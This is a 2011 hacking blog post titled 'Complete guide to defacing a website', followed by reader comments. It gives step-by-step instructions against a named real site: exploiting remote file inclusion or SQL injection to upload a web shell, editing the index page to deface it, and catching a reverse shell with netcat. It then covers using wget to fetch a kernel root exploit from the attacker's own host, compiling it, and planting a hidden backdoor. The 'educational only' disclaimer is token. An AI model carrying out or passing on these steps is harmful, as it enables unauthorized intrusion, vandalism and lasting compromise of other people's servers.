Thursday, September 1, 2011

Complete guide to defacing a website - CookBook!!





Please use  this post for educational and penetration testing your own website only. 


Disclaimer: The methods and shell upload shown in this tutorial were tested on a hacked website, so hackingalert is not responsible for any damage.

Special Thanks to Team Innobz for the shell upload (love you guyz).
Hello friends . In the recent time I was quiet busy with my own stuff so couldn't post cool hacking articles.
So I kept my blog traffic and adsense ticking by posting keygens and cracks .
Finally I have a nice post for you all .
The complete guide to hacking a website.
I wont go very much in detail as it will make it a huge article then . In case you want your basics to be cleared then you can refer to the following articles first before proceeding.



Hacking a website/web server - A 3 Step Guide. 
Some FAQ's that you should know about hacking .

For other things you can keep googling as you proceed with the article. Like you can find lots of material related to Sql injection , XSS , input validation ,  remote file inclusion etc. Here I will show you the practical approach to these hacks.
Lets get started . Here I will explain you how to deface a website after you have found a vulnerable website.
In case you are still wondering that how to find a vulnerability then you should stop here and brush your skills.
Suppose you succeed in finding a vulnerability in a perticular website like sql i , RFI , XSS etc . So the question now lies is how you are going to further grow your attack .
The answer lies in loading a shell . It will make your task of gaining administrative rights  very easy.
Suppose you succeed in finding a Remote file inclusion vulnerability in a website and you succeed in uploading a shell . You can choose any flavor of shell like c99 , c57 etc.
Consider this example of myburraq.com . This website has been defaced by using SQL injection and a shell has been uploaded . In case you have trouble with shell basics then read my next posts. I will update here as soon as my post with shells is ready.

Once you have found out that the site is vulnerable , you can now proceed to upload a shell . First upload the shell on a free web server/file hosting service on the internet which will provide you a direct link to it , or you can also directly upload it depending on the type of attack you choose.
A shell is a piece of software that provides an interface for the users of an operating system which provides access to the service of the kernel . Hence once your shell is up and running you can gain access to various files on that server .
The uploaded shell looks similar to the one in this picture(click on the images to enlarge) :


If you notice the address bar here then you will have an idea of how I uploaded the shell to this site using remote file inclusion.
You will find various tabs at the top of this shell window . Now our task is to deface the website(which is already been done) . So now move to the file manager section of this shell . Click on the Files tab . You will see something like this :



Here you will find all the files associated with the webpage.
So now in order to deface the homepage of this website you will have to search for a filename of the type index.html or index.php or index.aspx etc . Generally these are the common types of file names for the home page of any website.
Once you find out the home page , select it and click the edit button.



You can now edit the html according to the way you want and post your glittering "hacked" posters all around. Once you save it , you are done with defacing.
But the fight doesn't end here.
what next  . How to use this server for further exploration like gaining root access , setting up a backdoor etc.
Lets work on to gain root access.
Move on to the Network section of your shell .
You will find an option to back connect.
But before you can back connect your machine with the shell you should download Netcat from internet(google out) . Unzip netcat in the C drive and pass the following command in your command prompt -  c:> nc -l -n -v -p PORT   where PORT is the port number where you want to forward your connection . Lets make it 1212 .
Your command prompt will look somthing like this :


Now go back to your shell and configure your back - connect options . Enter your ip address and port number 1212 so as to connect back to your machine.

Your command prompt will then list that you are connected to the shell and ready to receive your commands.
So now lets move on to root the server.
You will first have to search for the version of kernel in your target .
type in the following command in your command prompt : uname -a
This will tell you the various versions of kernel , php , FTP etc available on the server .
The next step will be to find a local root exploit for the perticular version of kernel . In my case it is kernel 2.6.18 .
So i find an exploit(google it or go to miliw0rm) upload it on my free web server and get a link .
In my case the exploit is 17439.c . So after uploading it on my free web server( i prefer 110mb.com) , I will will have to get it uploaded in my victim as well .
Proceed with the following command in your command prompt :
wget http://myserver.com/17439.c where myserver.com is the my file hosting server.
Your command prompt will look somthing like this

Once you are done with the uploading part  , you will now have to compile it by typing the following command : gcc 17439.c -o 17439 (refer figure)
Upon successful compilation of the exploit you will have the root privilege of the server and you can be much more destructive now.
The similar procedure can now be used to hide a backdoor by uploading it on the machine and since you have the root privilege now so you can further make the backdoor hide somewhere inside which can act as your permanent entry point to the server.
There are lots of things to explore further witth this . I will strongly suggest you all to never deface a website , instead try and help them out in fixing the problem , keep your work on the constructive side .
In case you have any doubts regarding this post then feel free to add your comments here.

UPDATE - The website explained in this tutorial is down as it was defaced(not by me ofcourse) but the basic process remains the same for any vulnerable website.

DARKLORD!!

4 comments:

  1. I have no words for this great post such a awe-some information i got gathered. Thanks to Author.
    Android app development companies| Android phone app development

    ReplyDelete
  2. Nice info but how can i upload the shell,i may need the cpanel username and password of a remote site.Anyway Would you please suggest me how to protect websites with this issue you provided.

    ReplyDelete